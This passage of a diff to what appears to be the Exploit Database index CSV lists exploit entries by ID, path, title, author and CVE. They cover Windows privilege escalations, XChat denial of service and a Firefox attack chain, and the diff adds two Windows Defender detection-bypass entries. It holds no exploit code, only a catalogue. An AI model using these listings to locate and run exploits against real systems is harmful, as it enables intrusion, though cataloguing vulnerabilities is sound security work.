Service",2016-12-25,hyp3rlinx,dos,windows,,2016-12-25,2016-12-25,0,,"Denial of Service (DoS)",,,, 2124,exploits/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service",2006-08-07,ratboy,dos,windows,,2006-08-06,2011-04-27,1,OSVDB-29165;CVE-2006-4455,,,,http://www.exploit-db.comxchat-2.6.7.exe, 2147,exploits/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service",2006-08-08,Elo,dos,windows,,2006-08-07,2011-04-27,1,OSVDB-29165;CVE-2006-4455,,,,http://www.exploit-db.comxchat-2.6.7.exe, @@ -46204,6 +46210,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41020,exploits/windows_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)",2017-01-03,Saif,local,windows_x86-64,,2017-01-11,2017-01-17,1,MS16-098,,,,,https://sensepost.com/blog/2017/exploiting-ms16-098-rgnobj-integer-overflow-on-windows-8.1-x64-bit-by-abusing-gdi-objects/ 42435,exploits/windows_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,local,windows_x86-64,,2017-08-08,2017-08-09,1,MS16-098,Local,,,,https://github.com/sensepost/gdi-palettes-exp 39035,exploits/windows_x86-64/local/39035.txt,"Microsoft Windows 8.1 - 'win32k' Local Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",local,windows_x86-64,,2015-12-18,2016-02-03,1,CVE-2015-0057;OSVDB-118177;MS15-010,,,,, +51802,exploits/windows_x86-64/local/51802.txt,"Microsoft Windows Defender - VBScript Detection Bypass",2024-02-19,hyp3rlinx,local,windows_x86-64,,2024-02-19,2024-02-19,0,,,,,, +51801,exploits/windows_x86-64/local/51801.txt,"Microsoft Windows Defender Bypass - Detection Mitigation Bypass",2024-02-19,hyp3rlinx,local,windows_x86-64,,2024-02-19,2024-02-19,0,,,,,, 20861,exploits/windows_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042)",2012-08-27,"Shahriyar Jalayeri",local,windows_x86-64,,2012-08-27,2017-07-14,1,CVE-2012-0217;OSVDB-82850;MS12-042,,,http://www.exploit-db.com/screenshots/idlt21000/screen-shot-2012-08-27-at-100534-am.png,,http://packetstormsecurity.org/files/115908/sysret.rar 44586,exploits/windows_x86-64/local/44586.rb,"Microsoft Windows WMI - Recieve Notification Exploit (Metasploit)",2018-05-04,Metasploit,local,windows_x86-64,,2018-05-04,2018-05-18,1,CVE-2016-0040,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/ce5be387c43dde62c30e76229bac45a0ada01a1c/modules/exploits/windows/local/ms16_014_wmi_recv_notif.rb 47752,exploits/windows_x86-64/local/47752.js,"Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack",2019-12-07,"Axel Souchet",local,windows_x86-64,,2019-12-09,2019-12-09,0,CVE-2019-9810;CVE-2019-11708,,,,,https://github.com/0vercl0k/CVE-2019-11708/tree/1cdf26140f17de8a620e90f4f6ea3865e18e49ad